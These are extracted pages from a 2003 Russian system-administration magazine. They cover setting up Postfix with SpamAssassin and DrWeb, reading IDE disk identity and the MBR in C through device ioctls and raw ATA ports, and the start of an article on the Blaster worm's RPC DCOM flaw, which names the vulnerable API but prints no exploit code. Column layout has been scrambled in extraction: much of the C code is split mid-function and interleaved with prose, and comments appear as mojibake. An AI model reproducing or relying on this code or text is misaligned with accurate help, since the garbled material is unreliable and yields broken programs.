spamassassin – perl-скрипт, работает сам по себе, под-
робней – «man spamassassin». Установка подробно
описана в файле INSTALL.
Мой Postfix работает в следующей связке: Postfix+Cy-
rus-SASL+Mysql+Courier-IMAP+SquirrelMail+DrWeb, а те-
перь еще и SpamAssassin.

Postfix – сам MTA;

Cyrus-SASL – используется для авторизации пользо-
вателей (пока только SMTP AUTH);

MySQL – БД – хранит все бюджеты пользователей;

Courier-IMAP – POP3- и IMAP-сервисы;

SquirrelMail – веб-интерфейс для пользователей, кста-
ти, нормально работает с кириллицей;

DrWeb – антивирус, работает как фильтр, в этом соб-
ственно вся проблема и была. Если прикручивать
SpamAssassin как один-единственный фильтр, думаю,
проблем особых возникнуть не должно. Схема про-
ста, в master.cf прописывам фильтр, например, spam,
с опцией:
-o content_filter=spam
daemon smtpd, говорим «использовать фильтр spam».
Письмо, пришедшее на smtp, переправляется на spamс,
spamс проверяет и с помощью sendmail возвращает об-
ратно в очередь.
--- MASTER.CF ---
#=====================================================================
# service type private unpriv chroot wakeup maxproc command+args
# (yes) (yes) (yes)(never) (100)
#=====================================================================
smtp inet n - n - 50 smtpd
-o content_filter=spam:dummy
...
# SpamAssassin Filter
# подключить SpamAssassin к Postfix.
====================================================================
spam unix - n n - - pipe
flags=R user=spam argv=/usr/bin/spamc -u spam -e ↵
/usr/sbin/sendmail -t
--- END MASTER.CF ---
(Кстати, с «:dummy» надо еще поэкспериментировать.)
Но SpamAssassin у меня не единственный фильтр, есть
еще и DrWeb. Вот как было все прописано до использова-
ния SpamAssassin.
--- MASTER.CF ---
#=====================================================================
# service type private unpriv chroot wakeup maxproc command+args
# (yes) (yes) (yes)(never) (100)
#=====================================================================
smtp inet n - n - 50 smtpd
-o content_filter=drweb:dummy
№9(10), сентябрь 2003
администрирование
...
# DrWeb AntiVirus Filter
#=====================================================================
drweb unix - n n - - pipe
flags=R user=drweb argv=/opt/drweb/drweb-postfix -f ↵
${sender} -- ${recipient}
--- END MASTER.CF ---
Фильтровать почту будем, используя именно spamc/
spamd, а не через perl-скрипт spamassassin. Так оно на-
много быстрее… да и вообще симпатичнее.
Создаем в системе пользователя с домашним катало-
гом «/etc/mail/spamassassin», shell можно не давать (/bin/fasle).
Но валидный shell очень удобен, когда надо добавить/уда-
лить какой-нибудь адрес в White/Black List. Решайте сами.
Также создаем группу spam. Каталоги /etc/mail/spamassassin
и /usr/local/share/spamassassin отдаем в распоряжение бюд-
жету spam (chown –R spam.spam /path/to/dir).
С документацией по настройке spamd трудности [2], я
использовал веб-интерфейс, написанный Michael Moncur [3].
Принцип фильтрации следующий: во всех письмах, рас-
познанных как спам, поля темы меняются на «SPAM:
<original subject>».
Запускаем spamd: прочтите руководство и выберите
необходимые параметры (man spamd). Меня устроило
следующее:
/usr/bin/spamd -d -a -c -m 50 -u spam
* èñïîëüçóéòå îïöèþ "-D" äëÿ îòëàäêè.
* íå çàáóäüòå ïðîïèñàòü spamd â ñòàðòîâûõ ñêðèïòàõ
Уже можно протестировать SpamAssassin. Сохраните
спамовское письмо, которое пришло к вам, на сервере и
подайте его на вход spamc (желательно сразу использо-
вать параметр -u user).
/usr/bin/spamc -u spam -e /usr/sbin/sendmail –t ↵
</path/to/spam_mail
Письмо пройдет проверку и вернется в очередь MTA,
затем опять упадет к вам в Home_Dir. Можете проверять
почтовый ящик. Если spamd был запущен с опцией «-D» –
в лог-файле (скорее всего в /var/log/maillog) вы найдете
подробный отчет о проделанной работе. Работает? От-
лично, прикручиваем фильтр в Postfix. (Не работает? Вни-
мательно прочтите сообщения в лог-файле.)
Приступим к настройке Postfix. (DrWeb настроен и нор-
мально работает.) Есть как минимум два варианта, как

Первый способ я нашел в статье reVen [6]. Его суть:
передача почты от сервиса к сервису, прописанных в
master.cf. Но мне такой способ не понравился. Зачем
дополнительно использовать Perl в перенаправления
с сокета на сокет? Можно вообще без лишних сокетов
(мое личное мнение).

Может, я изобрел велосипед, но дошел до этого сам, хотя
ничего сложного в нем нет. Изменяем в master.cf фильт-
р\сервис drweb, в сумме получаем следующий файл:
--- MASTER.CF ---
#=====================================================================
# service type private unpriv chroot wakeup maxproc command+args
# (yes) (yes) (yes) (never) (100)
#=====================================================================
smtp inet n - n - 50 smtpd
51
 администрирование
-o content_filter=drweb:dummy
...
# DrWeb AntiVirus Filter and SpamAssassin Filter
# Ссылки:
====================================================================
drweb unix - n n - -
flags=R
user=drweb
argv=/usr/local/sbin/postfix_filter -f ${sender} ↵
-- ${recipient}
--- END MASTER.CF ---
А вот и маленький, да удаленький скриптик на BASH,
который получает письмо от Postfix, проверяет его на spam
с помощью spamc и отдает его (письмо) антивирусу DrWeb.
--- /usr/local/sbin/postfix_filter ---
#!/bin/sh
(/usr/bin/spamc -u spam -s 1024000 | ↵
/opt/drweb/drweb-postfix $@) <&0
--- END /usr/local/sbin/postfix_filter ---
* -s – ìàêñèìàëüíûé ðàçðåð ïðîâåðÿåìîãî ïèñüìà,
* ïî óìîë÷àíèþ 250k
Вот и вся настройка. Еще раз повторюсь, если что-то
не работает, внимательно прочтите лог-файлы.
pipe 1. SpamAssassin Homesite: http://www.spamassassin.org, в
статье описывается версия 2.55.
2. h t t p : / / w w w . s p a m a s s a s s i n . o r g / d o c /
Mail_SpamAssassin_Conf.html
3. http://www.yrex.com/spam/spamconfig.php
4. http://www.perl.com/CPAN – все необходимое для Perl.
5. Postfix Homesite: http://www.postfix.org
6. h t t p : / / r a v e n . e l k . r u / u n i x / h o w - t o / p o s t f i x 2 + c y r u s -
sasl2+kav+spamassassin+courier-
imap+tls+mysql+FreeBSD4/postfix2+cyrus-
sasl2+kav+spamassassin+courier-
imap+tls+mysql+FreeBSD4.html – вариант использова-
ния Postfix + SpamAssassin
7. Статьи по настройке Postfix: http://www.onix.opennet.ru/
mail/mail.html; http://linuxnews.ru/docs/new/isp-mail/
version1.2/isp-mail-howto.1.2.rus.txt

52
hardware

РАБОТА С ЖЕСТКИМ ДИСКОМ

НА ПРОГРАММНОМ УРОВНЕ

ВЛАДИМИР МЕШКОВ

54

В номере 3(4) журнала «Системный администратор» была
опубликована статья Алексея Серебрякова «Основы сис-
тем хранения данных». В продолжение данной темы да-
вайте рассмотрим, как осуществить доступ к IDE-диску
на программном уровне при помощи файла устройства и
через порты ATA-контроллера.
Файлы устройств
Файл – основа любой операционной системы, посколь-
ку именно с ним производится наибольшее число дей-
ствий. В UNIX- и POSIX-системах существуют файлы сле-
дующих типов:

обычный файл;

каталог;

FIFO-файл;

байт-ориентированный файл устройства;

блок-ориентированный файл устройства.
Блок-ориентированный файл устройства служит для
представления физического устройства, которое пере-
дает данные блоками. Примером блок-ориентированно-
го устройства является жесткий диск. Байт-ориентиро-
ванный файл устройства служит для представления фи-
зического устройства, которое передает данные побай-
тово (например, модем). Прикладная программа может
выполнять операции чтения и записи с файлом устрой-
ства так же, как с обычным файлом, а операционная
система будет автоматически вызывать соответствую-
щий драйвер устройства для выполнения фактической
передачи данных между физическим устройством и при-
ложением. Файл устройства создается командой mknod,
одним из аргументов которой является старший номер
устройства (major device number). По сути, старший но-
мер – это индекс в таблице ядра, которая содержит ад-
реса всех драйверов, известных системе. В ОС Linux
создаются две таблицы – таблица блочных устройств
(block device switch) и таблица символьных устройств
(character device switch). Обе таблицы являются масси-
вом структур и проиндексированы при помощи значе-
ния старшего номера устройства. Таблица блочных ус-
тройств определена в файле fs/block_dev.c следующим
образом:
static struct {
const char *name;
struct block_device_operations *bdops;
} blkdevs[MAX_BLKDEV];
Этот массив заполняется во время регистрации блочно-
го устройства в системе. Для регистрации устройства соот-
ветствующий драйвер вызывает функцию register_blkdev (см.
файл fs/block_dev.c):
int register_blkdev(unsigned int major, const char * name,
struct block_device_operations *bdops)
{ чен как Primary Master. Согласно обозначениям блоч-
....
blkdevs[major].name = name;
blkdevs[major].bdops = bdops;
return 0;
}
Аргумент major – старший номер устройства, name – имя
№9(10), сентябрь 2003
hardware
файла устройства, структура struct block_device_operations
содержит функции, выполняемые драйвером устройства.
Однако функции read и write в этой структуре отсутству-
ют. Дело в том, что пользовательский процесс не выпол-
няет напрямую операции чтения/записи в блочное устрой-
ство. Для этой цели драйвер предоставляет системе ме-
ханизм request, и все операции ввода/вывода выполня-
ются через буферный кеш системы, но это тема для от-
дельной статьи.
При снятии регистрации соответствующий элемент
массива blkdevs обнуляется:
int unregister_blkdev(unsigned int major, const char * name)
{
....
blkdevs[major].name = NULL;
blkdevs[major].bdops = NULL;
return 0;
}
Таблица символьных устройств определена в фай-
ле fs/devices.c и также является массивом структур, ко-
торый заполняется при регистрации устройства в сис-
теме:
struct device_struct {
const char * name;
struct file_operations * fops;
};
static struct device_struct chrdevs[MAX_CHRDEV];
Структура struct file_operations определена в файле
<linux/fs.h> и содержит функции, выполняемые драйве-
ром символьного устройства.
Когда пользовательский процесс читает данные из
файла устройства или записывает их, ядро, используя
старший номер устройства в качестве индекса, находит в
соответствующей таблице нужную процедуру драйвера и
выполняет запрашиваемое действие.
Кроме операций чтения/записи драйвер также предо-
ставляет возможность управления устройством. Опера-
ция управления осуществляется при помощи функции
ioctl. Эта функция вызывается пользовательским процес-
сом и имеет следующий прототип:
int ioctl(int fd, int cmd, ...);
Аргументы функции: int fd – файловый дескриптор ус-
тройства; int cmd – команда, посылаемая устройству. Тре-
тий параметр является специфичным для каждого устрой-
ства, поэтому в прототипе функции не указан.
Доступ к жесткому диску
через файл устройства
Предположим, что в системе присутствует один нако-
питель на жестком магнитном диске, который подклю-
ных устройств, принятым в ОС Linux, ему соответству-
ет файл устройства /dev/hda. Разработаем программ-
ный модуль, выполняющий чтение первого сектора
(MBR) и получающий информацию об устройстве, та-
кой, как модель жесткого диска, его серийный номер,
55
 hardware
геометрию (число цилиндров/головок/секторов) и чис- read(hda,sector,sizeof(sector));
write(sect,sector,sizeof(sector));
ло логических блоков.
Нам понадобятся следующие заголовочные файлы: close(hda);
close(sect);
#include <stdio.h> return (0);
#include <fcntl.h> }
#include <unistd.h>
#include <sys/types.h> Как вы видите, доступ к жесткому диску через файл
#include <errno.h>
#include <linux/hdreg.h> устройства наиболее простой и удобный, т.к. позволя-
ет абстрагироваться от деталей функционирования ус-
В файле <linux/hdreg.h> определена структура struct тройства.
hd_driveid, предназначенная для хранения информации Давайте теперь посмотрим на жесткий диск с точки
идентификации устройства, и перечень команд управле- зрения драйвера, но в начале – немного теории.
ния устройством.

int main()
{
Интерфейс АТА
Ниже приведены краткие сведения об интерфейсе АТА-2.
struct hd_driveid ide; Для получения детальной информации обратитесь к спе-
int hda, sect;
char sector[512]; цификации.

Для доступа к устройству достаточно стандартным Регистры АТА-контроллера

способом открыть соответствующий файл устройства:
hda=open("/dev/hda",O_RDONLY);
if(!hda) {
perror("hda");
} из двух блоков – блока командных регистров и блока уп-
sect=open("mbr",O_CREAT|O_RDWR,0600);
if(!sect) {
perror("sect");
} устройству и передачи информации о его состоянии. Со-
Для получения информации идентификации устрой-
ства посылаем команду HDIO_GET_IDENTITY. Коман-
да идентификации позволяет считать из контроллера
блок из 256 слов, характеризующих устройство. Резуль-
тат будет сохранен в структуре struct hd_driveid ide, ад-
рес которой задается в качестве третьего аргумента
функции ioctl:
if(ioctl(hda,HDIO_GET_IDENTITY,&ide)) ↵
perror ("HDIO_GET_IDENTITY");
Как уже было упомянуто, перечень команд управле-
ния устройством определен в файле <linux/hdreg.h>. На-
пример, команды включения 32-битного режима обмена
данными, режима DMA и мультисекторного чтения выг-
лядят следующим образом:
static u_long dma=1, io32set=1, mult=16;
if(ioctl(hda,HDIO_SET_32BIT,io32set)) ↵
perror("HDIO_SET_32BIT");
if(ioctl(hda,HDIO_SET_DMA,dma)) perror("HDIO_SET_DMA");
if(ioctl(hda,HDIO_SET_MULTCOUNT,mult)) ↵
perror("HDIO_SET_MULTCOUNT");
Отобразим информацию идентификации устройства:
printf("Ñåðèéíûé íîìåð – %s\n",ide.serial_no);
printf("Ìîäåëü – %s\n",ide.model);
printf("×èñëî ëîãè÷åñêèõ áëîêîâ – %d\n",ide.lba_capacity);
printf("×èñëî öèëèíäðîâ – %d\n",ide.cyls);
printf("×èñëî ãîëîâîê – %d\n",ide.heads);
printf("×èñëî ñåêòîðîâ – %d\n",ide.sectors);
Считываем первый сектор и сохраняем его в отдель-
ном файле:
Каждое устройство АТА (жесткий диск с интерфейсом
АТА) имеет стандартный набор регистров, адресуемых
сигналами от хост-адаптера (средства сопряжения интер-
фейса АТА с системной шиной). Набор регистров состоит
равляющих регистров.
Блок командных регистров служит для посылки команд
став блока командных регистров:

Регистр состояния/команд – в режиме чтения отража-
ет текущее состояние устройства в процессе выпол-
нения команды. Чтение регистра состояния разреша-
ет дальнейшее изменение его бит и сбрасывает зап-
рос аппаратного прерывания. В режиме записи при-
нимает коды команд для выполнения. Назначение бит
регистра состояния:

Бит 7 – BSY (Busy) указывает на занятость устрой-
ства. При единичном значении устройство игнори-
рует попытки записи в блок командных регистров.
При нулевом значении этого бита регистры коман-
дного блока доступны. Бит устанавливается под
действием аппаратного или программного сброса,
а также при получении команды.

Бит 6 – DRDY (Device Ready) указывает на готов-
ность устройства к восприятию любых кодов ко-
манд.

Бит 5 – DF (Device Fault) – индикатор отказа уст-
ройства.

Бит 4 – DSC (Device Seek Complite) – индикатор за-
вершения поиска трека.

Бит 3 – DRQ (Data Request) – индикатор готовнос-
ти к обмену словом или байтом данных.

Бит 2 – CORR (Correct Data) – индикатор исправ-
ленной ошибки данных.

Бит 1 – IDX (Index) – индекс трактуется специфично
для каждого производителя. Бит 0 – ERR (Error) –
индикатор ошибки выполнения предыдущей опе-
рации. Дополнительная информация содержится в
регистре ошибок.

56


Регистр номера цилиндра (старшего и младшего
байта) и номера сектора имеют двоякое назначение
в зависимости от выбранной системы адресации
(CHS или LBA). Они инициализируются хост-адап-
тером, а в случае возникновения ошибки при опе-
рации устройство поместит в них адрес, по которо-
му встретилась ошибка.

Регистр номера устройства и головки, кроме хране-
ния части адресной информации, служит для выбо-
ра ведущего или ведомого устройства (Device-0 и
Device-1 согласно спецификации ATA) и метода ад-
ресации.

Биты 7 и 5 – зарезервированы.

Бит 6 – единичным значением указывает на при-
менение режима адресации LBA. При нулевом зна-
чении бита используется режим CHS.

Бит 4 – DEV (Device) – выбор устройства. При DEV=0
выбрано устройство-0 (Master), при DEV=1 – уст-
ройство-1 (Slave).

Биты 3-0 имеют двоякое назначение, в зависимос-
ти от выбранной системы адресации. В режиме CHS
они содержат номер головки, в режиме LBA – стар-
шие биты логического адреса.

Регистр данных может использоваться как 8-битный и
16-битный, в зависимости от типа данных, передавае-
мых в текущей команде.

Регистр ошибок хранит состояние выполнения после-
дней операции или диагностический код.

Регистр свойств (Features Register) используется в за-
висимости от команды.

Регистр счетчика секторов содержит число секторов,
участвующих в обмене. Нулевое значение соответству-
ет 256 секторам.
Блок управляющих регистров используется для уп-
равления устройством и получения байта его состояния.
В состав блока входят альтернативный регистр состоя-
ния и регистр управления устройством. Альтернативный
регистр состояния имеет те же биты, что и основной, но
его чтение не приводит ни к каким изменениям состоя-
ния устройства.
В регистре управления устройством биты 7-3 заре-
зервированы, бит 0 всегда нулевой, используются толь-
ко два бита:

Бит 2 – SRST (Software Reset) – программный сброс
действует все время, пока бит не будет сброшен. Оба
устройства шины воспринимают программный сброс
одновременно.

Бит 1 – IEN# (Interrupt Enable) – инверсный бит разре-
шения прерывания.
Адреса регистров контроллера устройства 0 опреде-
лены в файле <linux/hdreg.h>:
/* ðåãèñòð äàííûõ */
#define HD_DATA 0x1f0
/* ðåãèñòð îøèáîê */
#define HD_ERROR 0x1f1
/* ðåãèñòð ñ÷åò÷èêà ñåêòîðîâ */
#define HD_NSECTOR 0x1f2
/* ðåãèñòð ñòàðòîâîãî ñåêòîðà */
№9(10), сентябрь 2003
hardware
#define HD_SECTOR 0x1f3
/* ðåãèñòð ìëàäøåãî áàéòà íîìåðà öèëèíäðà
*/#define HD_LCYL 0x1f4
/* ðåãèñòð ñòàðøåãî áàéòà íîìåðà öèëèíäðà */
#define HD_HCY 0x1f5
/* 101dhhhh, d=óñòðîéñòâî, hhhh=ãîëîâêà */
#define HD_CURRENT 0x1f6
/* ðåãèñòð ñîñòîÿíèÿ/êîìàíä */
#define HD_STATUS 0x1f7
Протокол взаимодействия
Обычный протокол взаимодействия хоста с устройством
выглядит следующим образом:
1. Хост читает регистр состояния устройства, дожидаясь
нулевого значения бита BSY.
2. Дождавшись освобождения устройства, хост записы-
вает в регистр номера устройства и головки байт, у
которого бит DEV указывает на адресуемое устрой-
ство.
3. Хост читает основной регистр состояния адресован-
ного устройства, дожидаясь признака его готовности
(DRDY = 1).
4. Хост заносит требуемые параметры в блок командных
регистров.
5. Хост записывает код команды в регистр команд.
6. Устройство устанавливает бит BSY и переходит к ис-
полнению команды.
Для команд, не требующих передачи данных (ND):
7. Завершив исполнение команды, устройство сбрасы-
вает бит BSY и устанавливает запрос прерывания. К
этому моменту в регистрах состояния и ошибок уже
имеется информация о результате выполнения.
Для команд, требующих чтения данных в режиме PIO:
7. Подготовившись к передаче первого блока данных по
шине АТА, устройство устанавливает бит DRQ. Если
была ошибка, она фиксируется в регистрах состояния
и ошибок. Далее устройство сбрасывает бит BSY и ус-
танавливает запрос прерывания.
8. Зафиксировав обнуление бита BSY (или по прерыва-
нию), хост считывает регистр состояния, что приводит
к сбросу прерывания от устройства.
9. Если хост обнаружил единичное значение бита DRQ,
он производит чтение первого блока данных в режи-
ме PIO (адресуясь к регистру данных). Если обнару-
жена ошибка, считанные данные могут быть недосто-
верными.
После передачи блока данных возможно одно из сле-
дующих действий:

если на шаге 8 ошибка не обнаружена, а требуется
передача следующего блока, устройство устанавлива-
ет бит BSY, и данная последовательность повторяет-
ся с шага 7.

если есть ошибка или передан последний блок дан-
ных, устройство сбрасывает бит DRQ и выполнение
команды завершается.
Операцию записи на жесткий диск рассматривать не
будем.
57
 hardware
Доступ к жесткому диску Функция проверки готовности устройства к обмену
через порты АТА-контроллера данными:
Задача прежняя – получить информацию идентифика-
ции устройства и считать MBR. Рассмотрим программ- int hd_data_request()
{
ный код. unsigned char status;
Заголовочные файлы: IN_P_B(status,HD_STATUS);
if(status & 0x8) return 1;
return 0;
}
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/hdreg.h> Если бит 3 (DRQ) регистра состояния установлен, дан-
ные находятся в регистре данных и готовы для считывания.
Для работы с портами ввода/вывода определим не- Следующая функция проверяет, не произошла ли
сколько макросов: ошибка при работе устройства:

#define OUT_P_B(val,port) \ void check_error()

asm( \ {
"outb %%al, %%dx" \ unsigned char a;
::"a"(val),"d"(port) \
) IN_P_B(a,HD_STATUS);
if (a & 0x1) {
perror("HD_STATUS");
#define IN_P_B(val,port) \ exit(-1);
asm( \ }
"inb %%dx, %%al" \ return;
:"=a"(val) \ }
:"d"(port) \
) Установленный бит 0 (ERR) регистра состояния озна-
чает, что при выполнении последней операции произош-
#define IN_P_W(val,port) \ ла ошибка. Дополнительная информация содержится в ре-
asm( \
"inw %%dx, %%ax" \ гистре ошибок.
:"=a"(val) \ А теперь рассмотрим функцию получения информа-
:"d"(port) \
) ции идентификации устройства.

Макрос OUT_P_B осуществляет запись байта в порт, void get_hd_identity(struct hd_driveid *hd)
{
макросы IN_P_B и IN_P_W – чтения байта/слова из порта.
Для работы с устройством определим несколько фун- unsigned short a = 0;
int i = 0;
кций.
Функция проверки статуса устройства (занято/свобод- unsigned short buff1[0x100];
memset(buff1,0,0x100);
но):
В соответствии с протоколом взаимодействия прове-
void hd_busy() ряем статус устройства. Оно должно быть свободно:
{
unsigned char status;
hd_busy();
do {
IN_P_B(status,HD_STATUS);
} while (status & 0x80); Как только устройство освободилось, в регистр но-
return;
} мера устройства и головки заносим значение 0xA0
(10100000 в двоичном виде). Бит 4 (DEV) равен 0, сле-
Проверка статуса устройства осуществляется провер- довательно, нами выбрано ведущее устройство. Режим
кой значения бита 7 (BSY) регистра состояния. Если бит адресации в данном случае роли не играет, бит 6 оста-
сброшен, устройство свободно и регистры контроллера вим нулевым:
доступны.
Функция проверки готовности устройства к восприя- OUT_P_B(0xA0,HD_CURRENT);
тию команд:
Ожидаем готовность устройства к восприятию команд:
void hd_ready()
{ hd_ready();
unsigned char status;
do {
IN_P_B(status,HD_STATUS); Итак, устройство готово. В регистр команд (HD_STATUS)
} while (!(status & 0x40)); записываем код команды идентификации устройства –
return;
} 0xEC. Данная команда выполняется в режиме PIO. Пол-
ный перечень команд смотрите в спецификации:
Устройство готово, если бит 6 (DRDY) регистра состо-
яния установлен. OUT_P_B(0xEC,HD_STATUS);

58
 hardware
В ответ на эту команду устройство установит бит hd_ready();
DRQ и вернет блок данных, содержащих информацию
идентификации. Для считывания информации органи- В блок командных регистров заносим требуемые па-
зуем цикл: раметры:

do { OUT_P_B(N,HD_NSECTOR);
hd_busy(); OUT_P_B(s_sect,HD_SECTOR);
check_error(); OUT_P_B(s_cyl,HD_LCYL);
IN_P_W(a,HD_DATA); OUT_P_B((s_cyl >> 8),HD_HCYL);
if((i>=10 && i<=19) || (i>=27 && i<=46))
asm(
"xchgb %%ah, %%al" В регистр команд записываем код команды чтения
:"=a"(a)
:"0"(a)); секторов с повторами – 0x20. Данная команда выполня-
buff1[i++] = a; ется в режиме PIO:
} while(hd_data_request());

Дождавшись освобождения устройства, при помощи OUT_P_B(0x20,HD_STATUS);

функции check_error() читаем регистр состояния. При этом
мы сбрасываем прерывание от устройства и проверяем, Считываем блок данных в буфер buff:
не произошла ли ошибка. Затем считываем из регистра
данных значение. Считывание производим до тех пор, do {
hd_busy();
пока установлен бит DRQ. Как только будет передан пос- check_error();
ледний блок данных, устройство этот бит сбросит. Счи- IN_P_W(a,HD_DATA);
buff[i++] = a;
танную информацию сохраним в буфере buff1. } while(hd_data_request());
Копируем полученную информацию из буфера buff1 в
структуру struct hdreg hd: Считываем последние 4 байта и выходим из функции:

memcpy(hd,(struct hdreg *)buff1,0x100); IN_P_W(a,HD_DATA);

buff[i++] = a;

Очищаем буфер и выходим: IN_P_W(a,HD_DATA);

memset(buff1,0,0x100);
return;
}
Следующая функция осуществляет чтение сектора в
режиме адресации CHS.
void read_hd_sector_chs(unsigned short N, ↵
unsigned short s_sect, unsigned short s_cyl, ↵
unsigned short head, unsigned short *buff)
{
int i = 0;
unsigned short a;
if((!N) || (!s_sect)) return;
Аргументы функции:

N – число секторов для чтения;

s_sect – стартовый сектор;

s_cyl – стартовый цилиндр;

head – номер головки;

buff – буфер, куда все помещается.
Ожидаем освобождения устройства:
hd_busy();
В регистр номера устройства и головки заносим соот-
ветствующие данные. Бит 6 сброшен, что указывает на
режим адресации CHS:
buff[i] = a;
return;
}
Функция чтения сектора в режиме адресации LBA.
void read_hd_sector_lba(unsigned short N, ↵
unsigned int lba, unsigned short *buff)
{
int i = 0;
unsigned short a;
if(!N) return;
Аргументы функции:

N – число секторов для чтения;

lba – номер блока;

buff – буфер, куда все помещается.
Ожидаем освобождения устройства:
hd_busy();
Спецификацией АТА-2 в режиме LBA предусмотрен 28-
битный адрес сектора размером 512 байт, при этом макси-
мальный объем ограничивается значением 0,5 терабайт.
В регистре номера устройства и головки бит 6 уста-
навливаем в 1, а биты 3-0 будут содержать старшие биты
логического адреса (27-24):
OUT_P_B(0xE0|((lba & 0x0F000000) >> 24),HD_CURRENT);

OUT_P_B(0xA0|head,HD_CURRENT); Ожидаем готовность устройства к приему команд:

Ждем готовность устройства к приему команд: hd_ready();

№9(10), сентябрь 2003 59

 hardware
В блок командных регистров заносим требуемые па- стемы разрешение доступа к портам в диапазоне 0x1f0 –
раметры: 0x1f7:

OUT_P_B(N,HD_NSECTOR); ioperm(0x1f0,8,1);

В регистр номера сектора заносим биты 7-0 логичес- Вызовем функцию получения информации идентификации.
кого адреса: Результат будет помещен в структуру struct hd_driveid hd:

get_hd_identity(&hd);
OUT_P_B((lba & 0x000000FF),HD_SECTOR);

В регистр младшего байта номера цилиндра – биты Отобразим результаты:

15-8 логического адреса:
OUT_P_B(((lba & 0x0000FF00) >> 8),HD_LCYL);
В регистр старшего байта номера цилиндра – биты
23-16 логического адреса:
OUT_P_B(((lba & 0x00FF0000) >> 16),HD_HCYL);
printf("Ñåðèéíûé íîìåð – %s\n",hd.serial_no);
printf("Ìîäåëü – %s\n",hd.model);
printf("×èñëî öèëèíäðîâ - %d\n",hd.cur_cyls);
printf("×èñëî ãîëîâîê – %d\n",hd.cur_heads);
printf("×èñëî ñåêòîðîâ – %d\n",hd.cur_sectors);
printf("×èñëî ëîãè÷åñêèõ áëîêîâ – %d\n",hd.lba_capacity);
А теперь прочитаем первый сектор устройства (MBR)
в режиме CHS:

В регистр команд – команду чтения секторов с повто- sect = 1;

cyl = 0;
рами: head = 0;

OUT_P_B(0x20,HD_STATUS); read_hd_sector_chs(N,sect,cyl,head,buff);

Запишем в файл результат:

Получаем результат:
out=open("sect_chs", O_CREAT|O_RDWR, 0600);
do { write(out,(unsigned char *)buff,0x200*N);
hd_busy(); close(out);
check_error();
IN_P_W(a,HD_DATA); То же самое – в режиме LBA:
buff[i++] = a;
} while(hd_data_request());
lba = 0;
read_hd_sector_lba(N,lba,buff);
Считываем последние 4 байта и выходим:
out=open("sect_lba", O_CREAT|O_RDWR, 0600);
IN_P_W(a,HD_DATA); write(out,(unsigned char *)buff,0x200*N);
buff[i++] = a; close(out);

IN_P_W(a,HD_DATA); ioperm(0x1f0,8,0);
buff[i] = a; return (0);
return; }
}
Весь вышеприведенный код сохраним в файле disk.c.
Рассмотрим главную функцию: Исполняемый модуль получим, введя команду:

int main () gcc -o disk disk.c

{

Определим необходимые структуры и переменные: Работоспособность кода была проверена для ОС Linux,
версия ядра 2.4.20.
struct hd_driveid hd; Как вы понимаете, рассмотреть в рамках одной ста-
int out; тьи всю систему команд стандарта АТА не представляет-
unsigned short N = 1; ся возможным, да мы и не ставили перед собой такую
unsigned int sect, cyl, head, lba;
цель. Желающие могут продолжить освоение данной
/* темы, изучив спецификацию и систему команд стандар-
* N – ÷èñëî ñåêòîðîâ äëÿ ÷òåíèÿ
* sect – íîìåð ñåêòîðà та АТА либо исходные тексты утилиты hdparm.
* cyl – íîìåð öèëèíäðà
* head – íîìåð ãîëîâêè
* lba – íîìåð ëîãè÷åñêîãî áëîêà Литература:
*/ 1. Теренс Чан. Системное программирование на С++ для
unsigned short buff[0x100*N];
UNIX. Пер. с англ. – К.: Издательская группа BHV,
memset(buff,0,0x100*N); 1999. – 592 с.
memset(&hd,0,sizeof(struct hd_driveid));
2. Гук. М. Интерфейсы ПК: справочник – СПб: Питер Ком,
Чтобы не схлопотать Segmentation fault, запросим у си- 1999. – 416 с.

60
безопасность

ОЧЕРЕДНАЯ ВЕСКАЯ ПРИЧИНА

ЗАДУМАТЬСЯ О ПЕРЕХОДЕ
С ОС WINDOWS НА АЛЬТЕРНАТИВУ

ВИКТОР ИГНАТЬЕВ
62

12 августа, Швеция. 40 серверов интернет-провайдера
TeliaSonera в постоянной перезагрузке, администраторы в
панике, 20 000 клиентов подверглись атаке компьютеров
своего же провайдера, компания на грани банкротства.
По всей Азии и Европе большинство корпоративных
сетей подвергаются ежеминутной атаке. Многие корпо-
рации несут тысячные убытки, т.к. компьютеры не позво-
ляют обслуживать клиентов.
К концу дня информационные агентства в Дании со-
общили, что на данный момент парализована работа при-
близительно 2000 компьютеров, и эта цифра постоянно
увеличивается.
В Германии известный автомобильный гигант BMW
признал, что многие компьютеры корпорации работают
некорректно.
Что же это? Массовая атака хакеров? Или, может быть,
сбой в операционной системе? Нет, в очередной раз весь
мир стал свидетелем воплощения в жизнь реального прин-
ципа корпорации Microsoft: «Сначала деньги, а пользовате-
ли потом». Многие администраторы и простые пользовате-
ли ещё помнят Nimda и Code Red, помнят фразу «Hacked by
chinese», и теперь этот список дополнит ещё один –
W32.Lovsan.worm, так же он известен как W32.Blaster.
Итак, рассмотрим подробнее суть проблемы. 16 июля на
bugtraq пришло письмо от польской хакерской группы Last
Stage of Delirium. Они заявили, что обнаружили критичес-
кую уязвимость защиты во всех недавних версиях операци-
онных систем корпорации Microsoft. Уязвимость затрагива-
ет заданные по умолчанию инсталляции Windows NT 4.0,
Windows 2000, Windows XP, а также Windows 2003 Server,
которая, кстати, была разрекламирована как не воспри-
имчивая к атакам на переполнение буфера. Это ещё одно
подтверждение что «Сначала реклама, а потом дело, и
уж после этого может быть качество».
LSD предоставили общественности proof of concept
code, но полный исходный код эксплоита не был опубли-
кован, т.к. это повлекло бы за собой массовые взломы и
создание червей.
Реакция Microsoft оказалась на редкость незамедли-
тельной. Буквально в этот же день на официальном сай-
те компании было опубликовано подтверждение суще-
ствования уязвимости. Но несмотря на «джентльменский»
поступок LSD, 25 июля группа китайских хакеров Xfocus
опубликовала полный код эксплоита против англоязыч-
ных версий Windows 2000 и XP.
Так в чём же суть проблемы?
Уязвимость заключается в посылке специальных дан-
ных удалённой машине через порт 135 (TCP/IP). Соеди-
нение между клиентом и сервером обеспечивает служ-
ба RPC (Remote Procedure Call), которую использует ар-
хитектура DCOM.
Проблема истекает из ошибки в реализации API-фун-
кции:
HRESULT CoGetInstanceFromFile(
COSERVERINFO * pServerInfo,
CLSID * pclsid,
IUnknown * punkOuter,
DWORD dwClsCtx,
DWORD grfMode,
№9(10), сентябрь 2003
безопасность
OLECHAR * szName,
ULONG cmq,
MULTI_QI * rgmqResults
);
Переполнение буфера происходит в шестом парамет-
ре (szName), благодаря которому возможно выполнение
любого кода на удалённой машине.
После публикации эксплоита от Xfocus и подробного
объяснения на сайтах, посвященных компьютерной безо-
пасности, каждый день стали появляться новые реализа-
ции от разных хак-групп. В основном отличие от ориги-
нального заключалось в том, что количество поражаемых
версий Windows увеличивалось с каждым разом, снача-
